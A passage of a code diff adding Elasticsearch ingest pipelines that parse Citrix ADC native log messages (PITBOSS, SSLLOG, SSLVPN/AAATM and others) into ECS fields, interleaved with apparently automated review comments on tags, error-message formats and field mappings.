ctx.citrix?.device_event_class_id != null && ['UI','CLI','GUI','API','CONSOLE'].contains(ctx.citrix.device_event_class_id.toUpperCase()) + value: [process] + - set: + field: event.type + tag: set_event_type_start + if: ctx.citrix?.device_event_class_id != null && ['UI','CLI','GUI','API','CONSOLE'].contains(ctx.citrix.device_event_class_id.toUpperCase()) + value: [start] + - grok: + description: Extract fields from message of SUBSCRIBER, URLFILT, UI, CLI, GUI, API, CONSOLE and AAA feature. + tag: grok_subscriber_urlfilt_ui_cli_gui_api_console_aaa_feature + field: citrix.extended.message + patterns: + - '^Source %{IP:citrix_adc.log.source.ip} - Destination %{IP:citrix_adc.log.destination.ip} URL %{DATA:citrix_adc.log.url} - Category %{DATA:citrix_adc.log.category} - Category%{SPACE}group %{DATA:citrix_adc.log.category_group} - Reputation %{INT:citrix_adc.log.reputation} - Policy%{SPACE}action %{WORD:citrix_adc.log.policy_action}$' + - '^User %{USER:citrix_adc.log.user} -( ADM_User %{DATA:citrix_adc.log.adm_user} -)? Remote_ip %{IP:citrix_adc.log.remote_ip} - Command \"%{DATA:citrix_adc.log.command}\" - Status \"%{DATA:citrix_adc.log.status}\"$' + - '^Session %{GREEDYDATA:citrix_adc.log.session}$' + - '^User%{SPACE}Name%{SPACE}:%{SPACE}%{GREEDYDATA:citrix_adc.log.username}$' + - '^Failure%{SPACE}Reason%{SPACE}:%{SPACE}%{GREEDYDATA:citrix_adc.log.failure_reason}$' + - '^User %{USER:citrix_adc.log.user} - Client_ip %{IP:citrix_adc.log.client_ip} - Failure_reason \"%{DATA:citrix_adc.log.failure_reason}\" - Browser %{DATA:citrix_adc.log.browser}$' + - '^Extracted_groups \"%{GREEDYDATA:citrix_adc.log.groups}\"$' + - '%{GREEDYDATA:citrix_adc.log.message}' + ignore_failure: true + - set: + field: citrix.default_class + tag: set_default_class + value: true + if: ctx._tmp?.default == 'default ' # The trailing space is intended. 
+ - pipeline: + name: '{{ IngestPipeline "tcp_and_acl_feature" }}' + tag: pipeline_tcp_and_acl_feature + if: ctx.citrix?.device_event_class_id != null && (ctx.citrix.device_event_class_id == "TCP" || ctx.citrix.device_event_class_id == "ACL") + - pipeline: + name: '{{ IngestPipeline "alg_feature" }}' + tag: pipeline_alg_feature + if: ctx.citrix?.device_event_class_id != null && ctx.citrix.device_event_class_id == "ALG" + - pipeline: + name: '{{ IngestPipeline "sslvpn_and_aaatm_feature" }}' + tag: pipeline_sslvpn_and_aaatm_feature + if: ctx.citrix?.device_event_class_id != null && (ctx.citrix.device_event_class_id == "SSLVPN" || ctx.citrix.device_event_class_id == "AAATM") + - pipeline: + name: '{{ IngestPipeline "ci_feature" }}' + tag: pipeline_ci_feature + if: ctx.citrix?.device_event_class_id != null && ctx.citrix.device_event_class_id == "CI" + - pipeline: + name: '{{ IngestPipeline "ssllog_feature" }}' + tag: pipeline_ssllog_feature + if: ctx.citrix?.device_event_class_id != null && ctx.citrix.device_event_class_id == "SSLLOG" + - pipeline: + name: '{{ IngestPipeline "transform_feature" }}' + tag: pipeline_transform_feature + if: ctx.citrix?.device_event_class_id != null && ctx.citrix.device_event_class_id == "TRANSFORM" + - pipeline: + name: '{{ IngestPipeline "ica_feature" }}' + tag: pipeline_ica_feature + if: ctx.citrix?.device_event_class_id != null && ctx.citrix.device_event_class_id == "ICA" + - pipeline: + name: '{{ IngestPipeline "appfw_feature" }}' + tag: pipeline_appfw_feature + if: ctx.citrix?.device_event_class_id != null && ctx.citrix.device_event_class_id == "APPFW" + - pipeline: + name: '{{ IngestPipeline "cvpn_feature" }}' + tag: pipeline_cvpn_feature + if: ctx.citrix?.device_event_class_id != null && ctx.citrix.device_event_class_id == "CVPN" + - pipeline: + name: '{{ IngestPipeline "bot_feature" }}' + tag: pipeline_bot_feature + if: ctx.citrix?.device_event_class_id != null && ctx.citrix.device_event_class_id == "BOT" + - pipeline: + name: '{{ 
IngestPipeline "pitboss_feature" }}' + tag: pipeline_pitboss_feature + if: ctx.citrix?.device_event_class_id != null && ctx.citrix.device_event_class_id == "PITBOSS" + - pipeline: + name: '{{ IngestPipeline "dns_and_ssli_feature" }}' + tag: pipeline_dns_and_ssli_feature + if: ctx.citrix?.device_event_class_id != null && (ctx.citrix.device_event_class_id == "DNS" || ctx.citrix.device_event_class_id == "SSLI") + - convert: + field: citrix_adc.log.client_ip + tag: convert_client_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.client_ip != null && ctx.citrix_adc?.log.client_ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.outcome + tag: set_event_outcome_success + value: success + if: ctx.citrix_adc?.log?.status != null && ctx.citrix_adc.log.status.toLowerCase() == 'success' + - set: + field: event.outcome + tag: set_event_outcome_failure + value: failure + if: ctx.citrix_adc?.log?.status != null && ctx.citrix_adc.log.status.toLowerCase() == 'failure' + - set: + field: event.outcome + tag: set_event_outcome_failure + value: failure + if: ctx.citrix?.name != null && ctx.citrix.name == "LOGIN_FAILED" + - set: + field: client.ip + tag: set_client_ip_from_client_ip + copy_from: citrix_adc.log.client_ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.destination.ip + tag: convert_destination_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.destination?.ip != null && ctx.citrix_adc.log.destination.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: 
destination.ip + tag: set_destination_ip_from_destination_ip + copy_from: citrix_adc.log.destination.ip + ignore_empty_value: true + - set: + field: event.reason + tag: set_event_reason_from_failure_reason + copy_from: citrix_adc.log.failure_reason + ignore_empty_value: true + - set: + field: group.name + tag: set_group_name_from_groups + copy_from: citrix_adc.log.groups + ignore_empty_value: true + - set: + field: process.command_line + tag: set_process_command_line_from_command + copy_from: citrix_adc.log.command + ignore_empty_value: true + - convert: + field: citrix_adc.log.remote_ip + tag: convert_remote_ip_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.remote_ip != null && ctx.citrix_adc?.log.remote_ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.ip + tag: set_source_ip_from_remote_ip + copy_from: citrix_adc.log.remote_ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.source.ip + tag: convert_source_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.source?.ip != null && ctx.citrix_adc.log.source.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.ip + tag: set_source_ip_from_source_ip + copy_from: citrix_adc.log.source.ip + ignore_empty_value: true + - set: + field: url.original + tag: set_url_original_from_url + copy_from: citrix_adc.log.url + ignore_empty_value: true + - set: + field: user_agent.original + tag: set_user_agent_original_from_browser + copy_from: citrix_adc.log.browser + ignore_empty_value: true + - 
user_agent: + field: user_agent.original + if: ctx.user_agent?.original != null && ctx.user_agent.original != '' + tag: 'user_agent_processor' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag fail-{{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: user.name + tag: set_user_name_from_user + copy_from: citrix_adc.log.user + ignore_empty_value: true + - set: + field: user.name + tag: set_user_name_from_username + copy_from: citrix_adc.log.username + ignore_empty_value: true + - convert: + field: citrix_adc.log.reputation + tag: convert_reputation_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - lowercase: + field: event.action + tag: lowercase_event_action + ignore_missing: true + - lowercase: + field: network.protocol + tag: lowercase_network_protocol + ignore_missing: true + - lowercase: + field: network.transport + tag: lowercase_network_transport + ignore_missing: true + - append: + field: related.ip + tag: append_source_ip_into_related_ip + value: '{{{source.ip}}}' + allow_duplicates: false + if: ctx.source?.ip != null + - append: + field: related.ip + tag: append_destination_ip_into_related_ip + value: '{{{destination.ip}}}' + allow_duplicates: false + if: ctx.destination?.ip != null + - append: + field: related.ip + tag: append_destination_nat_ip_into_related_ip + value: '{{{destination.nat.ip}}}' + allow_duplicates: false + if: ctx.destination?.nat?.ip != null + - append: + field: related.ip + tag: append_source_nat_ip_into_related_ip + value: '{{{source.nat.ip}}}' + allow_duplicates: false + if: ctx.source?.nat?.ip != null + - append: + field: 
related.ip + tag: append_server_ip_into_related_ip + value: '{{{server.ip}}}' + allow_duplicates: false + if: ctx.server?.ip != null + - append: + field: related.ip + tag: append_client_ip_into_related_ip + value: '{{{client.ip}}}' + allow_duplicates: false + if: ctx.client?.ip != null + - append: + field: related.ip + tag: append_ip_address_into_related_ip + value: '{{{citrix_adc.log.ip_address}}}' + allow_duplicates: false + if: ctx.citrix_adc?.log?.ip_address != null + - append: + field: related.ip + tag: append_original_destination_ip_into_related_ip + value: '{{{citrix_adc.log.original_destination.ip}}}' + allow_duplicates: false + if: ctx.citrix_adc?.log?.original_destination?.ip != null + - append: + field: related.ip + tag: append_ssl_relay_address_into_related_ip + value: '{{{citrix_adc.log.ssl_relay.address}}}' + allow_duplicates: false + if: ctx.citrix_adc?.log?.ssl_relay?.address != null + - append: + field: related.user + tag: append_user_name_into_related_user + value: '{{{user.name}}}' + allow_duplicates: false + if: ctx.user?.name != null + - append: + field: related.user + tag: append_user_name_into_related_user + value: '{{{source.user.name}}}' + allow_duplicates: false + if: ctx.source?.user?.name != null + - append: + field: related.user + tag: append_user_name_into_related_user + value: '{{{destination.user.name}}}' + allow_duplicates: false + if: ctx.destination?.user?.name != null + - remove: + field: + - citrix_adc.log.action + - citrix_adc.log.browser + - citrix_adc.log.bytes.received + - citrix_adc.log.bytes.sent + - citrix_adc.log.callee.domain_name + - citrix_adc.log.callee.user_name + - citrix_adc.log.caller.domain_name + - citrix_adc.log.caller.user_name + - citrix_adc.log.cipher_suite + - citrix_adc.log.client_ip + - citrix_adc.log.client_port + - citrix_adc.log.clientside.rxbytes + - citrix_adc.log.clientside.txbytes + - citrix_adc.log.closure_reason + - citrix_adc.log.code + - citrix_adc.log.command + - citrix_adc.log.delink_time + 
- citrix_adc.log.destination.ip + - citrix_adc.log.destination.port + - citrix_adc.log.domain + - citrix_adc.log.domain_name + - citrix_adc.log.end_time + - citrix_adc.log.errmsg + - citrix_adc.log.error_code + - citrix_adc.log.failure_reason + - citrix_adc.log.group + - citrix_adc.log.groups + - citrix_adc.log.hostname + - citrix_adc.log.html_url + - citrix_adc.log.icap_server.ip + - citrix_adc.log.icap_server.port + - citrix_adc.log.infomsg + - citrix_adc.log.issuer_name + - citrix_adc.log.matched_url + - citrix_adc.log.method + - citrix_adc.log.nat.ip + - citrix_adc.log.nat.port + - citrix_adc.log.natted.ip + - citrix_adc.log.natted.port + - citrix_adc.log.nsica_session.client.ip + - citrix_adc.log.nsica_session.client.port + - citrix_adc.log.nsica_session.server.ip + - citrix_adc.log.nsica_session.server.port + - citrix_adc.log.origin_server.ip + - citrix_adc.log.origin_server.port + - citrix_adc.log.process.id + - citrix_adc.log.process.name + - citrix_adc.log.protocol + - citrix_adc.log.reason + - citrix_adc.log.referer_header + - citrix_adc.log.remote_ip + - citrix_adc.log.request.path + - citrix_adc.log.response.code + - citrix_adc.log.rewritten_url + - citrix_adc.log.rule_id + - citrix_adc.log.server.ip + - citrix_adc.log.source.ip + - citrix_adc.log.source.port + - citrix_adc.log.start_time + - citrix_adc.log.subject_name + - citrix_adc.log.total_bytes_received + - citrix_adc.log.total_bytes_send + - citrix_adc.log.translated_destination.ip + - citrix_adc.log.translated_destination.port + - citrix_adc.log.transport + - citrix_adc.log.url + - citrix_adc.log.user + - citrix_adc.log.username + - citrix_adc.log.vserver.ip + - citrix_adc.log.vserver.port + tag: remove_custom_duplicate_fields + ignore_missing: true + if: ctx.tags == null || !(ctx.tags.contains('preserve_duplicate_custom_fields')) +on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline 
{{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.kind + tag: set_pipeline_error_to_event_kind + value: pipeline_error diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/pitboss_feature.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/pitboss_feature.yml new file mode 100644 index 00000000000..0c5c417b7ac --- /dev/null +++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/pitboss_feature.yml 
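Review bot: The `user_agent` processor's on_failure message in native.yml differs from every other handler in this file — it prefixes the tag with `fail-` and reports `{{{_ingest.pipeline}}}` rather than `{{{_ingest.on_failure_pipeline}}}`, so error.message entries from that one processor will not match the format the surrounding `convert` handlers produce; reuse the same `value:` string as the others. Several processors also share a tag (`set_event_outcome_failure` is used twice, `append_user_name_into_related_user` three times, and the `event.type` setter for the TCP class is tagged `set_event_category`), which makes the tag reported in a failure message ambiguous when triaging pipeline errors; give each a unique tag, e.g. `tag: set_event_outcome_failure_from_login_failed` for the `LOGIN_FAILED` case. Finally, `%{INT:event.severity}` in `grok_tmp_details` captures a string while ECS declares event.severity as long; unless the calling pipeline converts it, `%{INT:event.severity:int}` would fix the type at extraction.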
@@ -0,0 +1,72 @@
+---
+description: Pipeline for Citrix Native messages of PITBOSS feature.
+processors:
+ - grok:
+ description: Extract fields from message of PITBOSS feature.
+ tag: grok_pitboss_feature
+ field: citrix.extended.message
+ patterns:
+ - '^Adding pitboss watch on \(%{INT:citrix_adc.log.watch_id}\)$'
+ - '^Deleting watch on \(%{INT:citrix_adc.log.watch_id}\)$'
+ - '^proc \(%{INT:citrix_adc.log.process.id}\) \(%{DATA:citrix_adc.log.process.name}\) has had its maximum number of restarts \(%{INT:citrix_adc.log.max_restarts}\), rebooting the system$'
+ - '^Restarting process old pid \(%{INT:citrix_adc.log.old_pid}\) action \(%{DATA:citrix_adc.log.action}\)$'
+ - '%{GREEDYDATA:citrix_adc.log.message}'
+ ignore_failure: true
+ - set:
+ field: event.action
+ tag: set_event_action_from_action
+ copy_from: citrix_adc.log.action
+ ignore_empty_value: true
+ - set:
+ field: process.name
+ tag: set_process_name_from_process_name
+ copy_from: citrix_adc.log.process.name
+ ignore_empty_value: true
+ - convert:
+ field: citrix_adc.log.process.id
+ tag: convert_process_id_to_long
+ type: long
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - set:
+ field: process.pid
+ tag: set_process_pid_from_process_id
+ copy_from: citrix_adc.log.process.id
+ ignore_empty_value: true
+ - convert:
+ field: citrix_adc.log.max_restarts
+ tag: convert_max_restarts_to_long
+ type: long
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - convert:
+ field: citrix_adc.log.old_pid
+ tag: convert_old_pid_to_long
+ type: long
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+ - convert:
+ field: citrix_adc.log.watch_id
+ tag: convert_watch_id_to_string
+ type: string
+ ignore_missing: true
+ on_failure:
+ - append:
+ field: error.message
+ value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}'
+on_failure:
+ - set:
+ field: event.kind
+ value: pipeline_error
+ - append:
+ field: error.message
+ value: '{{{ _ingest.on_failure_message }}}'
diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/ssllog_feature.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/ssllog_feature.yml
new file mode 100644
index 00000000000..8d717aa4108
--- /dev/null
+++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/ssllog_feature.yml
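Review bot: The catch-all pattern `'%{GREEDYDATA:citrix_adc.log.message}'` at the end of the grok_pitboss_feature pattern list is the only unanchored one; the sibling ssllog and sslvpn pipelines write it as `'^%{GREEDYDATA:citrix_adc.log.message}$'`, and using the anchored form here keeps the three new files uniform without changing what is matched, since GREEDYDATA consumes the whole message either way. The pipeline-level `on_failure` block also records only `{{{ _ingest.on_failure_message }}}`, dropping the processor type, tag and pipeline name that every per-processor handler in this file includes, and its `set` on event.kind carries no `tag:` unlike the `set_pipeline_error_to_event_kind` handler in the pipeline ending just above this file. Reusing the verbose message and tag there makes a document that failed the whole pipeline attributable to the processor that raised the error, which is what an analyst triaging `event.kind: pipeline_error` documents needs. Neither point changes the extracted fields.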
@@ -0,0 +1,216 @@ +--- +description: Pipeline for Citrix Native messages of SSLLOG feature. +processors: + - grok: + description: Extract fields from message of SSLLOG feature. + tag: grok_ssllog_feature + field: citrix.extended.message + patterns: + - '^Backend%{SPACE}SPCBId %{NUMBER:citrix_adc.log.spcb_id:int} - Server%{SPACE}IP %{IP:citrix_adc.log.server.ip} - Server%{SPACE}Port %{NUMBER:citrix_adc.log.server.port:int} - Protocol%{SPACE}Version %{DATA:citrix_adc.log.protocol_version} - Cipher%{SPACE}Suite \"%{DATA:citrix_adc.log.cipher_suite}\" - Session %{DATA:citrix_adc.log.session}(%{SPACE}- %{WORD:citrix_adc.log.server_authentication} -%{SPACE}SerialNumber \"%{DATA:citrix_adc.log.serial_number}\" - SignatureAlgorithm \"%{DATA:citrix_adc.log.signature_algorithm}\" - ValidFrom \"%{DATA:citrix_adc.log.valid_from}\" - ValidTo \"%{DATA:citrix_adc.log.valid_to}\" - HandshakeTime %{INT:citrix_adc.log.handshake_time} ms)?$' + - '^Certificate%{SPACE}Key%{SPACE}Pair %{DATA:citrix_adc.log.certificate_key_pair} - Days%{SPACE}To%{SPACE}Expire %{NUMBER:citrix_adc.log.days_to_expire:int}$' + - '^SPCBId %{NUMBER:citrix_adc.log.spcb_id:int} - Issuer%{SPACE}Name \"%{GREEDYDATA:citrix_adc.log.issuer_name}\"$' + - '^SPCBId %{NUMBER:citrix_adc.log.spcb_id:int} - Subject%{SPACE}Name \"%{GREEDYDATA:citrix_adc.log.subject_name}\"$' + - '^crl_name %{DATA:citrix_adc.log.crl_name} - server_ip %{IP:citrix_adc.log.server.ip} - server_port %{NUMBER:citrix_adc.log.server.port:int} - method %{WORD:citrix_adc.log.method} - ldapscope %{WORD:citrix_adc.log.ldap_scope}$' + - '^Domainname %{DATA:citrix_adc.log.domain_name} Ipaddress %{IP:citrix_adc.log.ip_address}$' + - '^SPCBId %{NUMBER:citrix_adc.log.spcb_id:int} - ClientIP %{IP:citrix_adc.log.client_ip} - ClientPort %{NUMBER:citrix_adc.log.client_port} - VserverServiceIP %{IP:citrix_adc.log.vserver.ip} - VserverServicePort %{NUMBER:citrix_adc.log.vserver.port} - ClientVersion %{DATA:citrix_adc.log.client_version} - CipherSuite 
\"%{GREEDYDATA:citrix_adc.log.cipher_suite}\"( - )?Session %{WORD:citrix_adc.log.session}(%{SPACE}- HandshakeTime %{INT:citrix_adc.log.handshake_time} ms)?( - Reason \"%{GREEDYDATA:citrix_adc.log.reason}\")?$' + - '^%{GREEDYDATA:citrix_adc.log.message}$' + ignore_failure: true + - date: + field: citrix_adc.log.valid_from + tag: date_valid_from + target_field: citrix_adc.log.valid_from + formats: + - MMM dd HH:mm:ss yyyy z + - MMM d HH:mm:ss yyyy z + if: ctx.citrix_adc?.log?.valid_from != null && ctx.citrix_adc.log.valid_from != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - date: + field: citrix_adc.log.valid_to + tag: date_valid_to + target_field: citrix_adc.log.valid_to + formats: + - MMM dd HH:mm:ss yyyy z + - MMM d HH:mm:ss yyyy z + if: ctx.citrix_adc?.log?.valid_to != null && ctx.citrix_adc.log.valid_to != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: http.request.method + tag: set_http_request_method_from_method + copy_from: citrix_adc.log.method + ignore_empty_value: true + - convert: + field: citrix_adc.log.server.ip + tag: convert_server_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.server?.ip != null && ctx.citrix_adc.log.server.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.ip + tag: set_source_ip_from_server_ip + copy_from: 
citrix_adc.log.server.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.server.port + tag: convert_server_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: source.port + tag: set_source_port_from_server_port + copy_from: citrix_adc.log.server.port + ignore_empty_value: true + - set: + field: user.domain + tag: set_user_domain_from_domain_name + copy_from: citrix_adc.log.domain_name + ignore_empty_value: true + - convert: + field: citrix_adc.log.spcb_id + tag: convert_spcb_id_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.days_to_expire + tag: convert_days_to_expire_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.ip_address + tag: convert_ip_address_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.ip_address != null && ctx.citrix_adc.log.ip_address != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - convert: + field: citrix_adc.log.client_ip + tag: convert_client_ip_to_ip + 
type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.client_ip != null && ctx.citrix_adc?.log.client_ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: client.ip + tag: set_client_ip_from_client_ip + copy_from: citrix_adc.log.client_ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.client_port + tag: convert_client_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: client.port + tag: set_client_port_from_client_port + copy_from: citrix_adc.log.client_port + ignore_empty_value: true + - convert: + field: citrix_adc.log.vserver.ip + tag: convert_vserver_ip_to_ip + type: ip + ignore_missing: true + if: ctx.citrix_adc?.log?.vserver?.ip != null && ctx.citrix_adc.log.vserver.ip != '' + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: server.ip + tag: set_server_ip_from_vserver_ip + copy_from: citrix_adc.log.vserver.ip + ignore_empty_value: true + - convert: + field: citrix_adc.log.vserver.port + tag: convert_vserver_port_to_long + type: long + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + 
field: server.port + tag: set_server_port_from_vserver_port + copy_from: citrix_adc.log.vserver.port + ignore_empty_value: true + - convert: + field: citrix_adc.log.handshake_time + tag: convert_handshake_time_to_string + type: string + ignore_missing: true + on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: tls.cipher + tag: set_tls_cipher_from_cipher_suite + copy_from: citrix_adc.log.cipher_suite + ignore_empty_value: true + - set: + field: tls.server.issuer + tag: set_tls_server_issuer_from_issuer_name + copy_from: citrix_adc.log.issuer_name + ignore_empty_value: true + - set: + field: tls.server.subject + tag: set_tls_server_subject_from_subject_name + copy_from: citrix_adc.log.subject_name + ignore_empty_value: true + - grok: + if: ctx.citrix_adc?.log?.protocol_version != null && ctx.citrix_adc.log.protocol_version != '' + tag: grok_protocol_version + field: citrix_adc.log.protocol_version + patterns: + - "^%{DATA:tls.version_protocol}v%{DATA:tls.version}$" + ignore_failure: true + - grok: + if: ctx.citrix_adc?.log?.client_version != null && ctx.citrix_adc.log.client_version != '' + tag: grok_protocol_version + field: citrix_adc.log.client_version + patterns: + - "^%{DATA:tls.version_protocol}v%{DATA:tls.version}$" + ignore_failure: true + - set: + field: event.reason + tag: set_event_reason_from_reason + copy_from: citrix_adc.log.reason + ignore_empty_value: true +on_failure: + - set: + field: event.kind + value: pipeline_error + - append: + field: error.message + value: '{{{ _ingest.on_failure_message }}}' 
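Review bot: The second grok processor near the end of the hunk, the one over `citrix_adc.log.client_version`, reuses the tag `grok_protocol_version` of the processor directly before it, so a failure message or trace naming that tag cannot tell the two apart; rename it `tag: grok_client_version`. Both processors copy `tls.version_protocol` straight from the captured prefix (`TLS` for an input like `TLSv1.2`), whereas ECS defines that field as the normalized lowercase protocol name, so a `lowercase` processor on `tls.version_protocol` with `ignore_missing: true` should follow them or downstream queries on `tls.version_protocol: tls` will miss these events. Separately, `set_source_ip_from_server_ip` maps the Backend pattern's Server IP to `source.ip` while `citrix_adc.log.vserver.ip` goes to `server.ip`; for a back-end connection the ADC opens toward a server, that address reads more like `destination.ip`, which is worth confirming against sample events before the mapping is relied on for correlation.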
diff --git a/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/sslvpn_and_aaatm_feature.yml b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/sslvpn_and_aaatm_feature.yml new file mode 100644 index 00000000000..97a08b44c8e --- /dev/null +++ b/packages/citrix_adc/data_stream/log/elasticsearch/ingest_pipeline/sslvpn_and_aaatm_feature.yml 
@@ -0,0 +1,398 @@ +--- +description: Pipeline for Citrix Native messages of SSLVPN and AAATM feature. +processors: + - grok: + description: Extract fields from message of SSLVPN and AAATM feature. + tag: grok_sslvpn_and_aaatm_feature + field: citrix.extended.message + patterns: + - '^User %{USER:citrix_adc.log.user} - Client_ip %{IP:citrix_adc.log.client_ip} - Nat_ip %{IP:citrix_adc.log.nat.ip} - Vserver %{IP:citrix_adc.log.vserver.ip}:%{INT:citrix_adc.log.vserver.port} - Browser_type \"%{DATA:citrix_adc.log.browser_type}\" - SSLVPN_client_type %{DATA:citrix_adc.log.sslvpn_client_type} - Group\(s\) \"%{DATA:citrix_adc.log.groups}\"$' + - '^User %{USER:citrix_adc.log.user} - Client_ip %{IP:citrix_adc.log.client_ip} - Nat_ip %{IP:citrix_adc.log.nat.ip} - Vserver %{IP:citrix_adc.log.vserver.ip}:%{INT:citrix_adc.log.vserver.port} - Start_time \"%{DATA:citrix_adc.log.start_time}\" - End_time \"%{DATA:citrix_adc.log.end_time}\" - Duration %{DATA:citrix_adc.log.duration} - Http_resources_accessed %{INT:citrix_adc.log.http_resources_accessed} - NonHttp_services_accessed %{INT:citrix_adc.log.non_http_services_accessed} - Total_TCP_connections %{INT:citrix_adc.log.total_tcp_connections} - Total_UDP_flows %{INT:citrix_adc.log.total_udp_flows} - Total_policies_allowed %{INT:citrix_adc.log.total_policies_allowed} - Total_policies_denied %{INT:citrix_adc.log.total_policies_denied} - 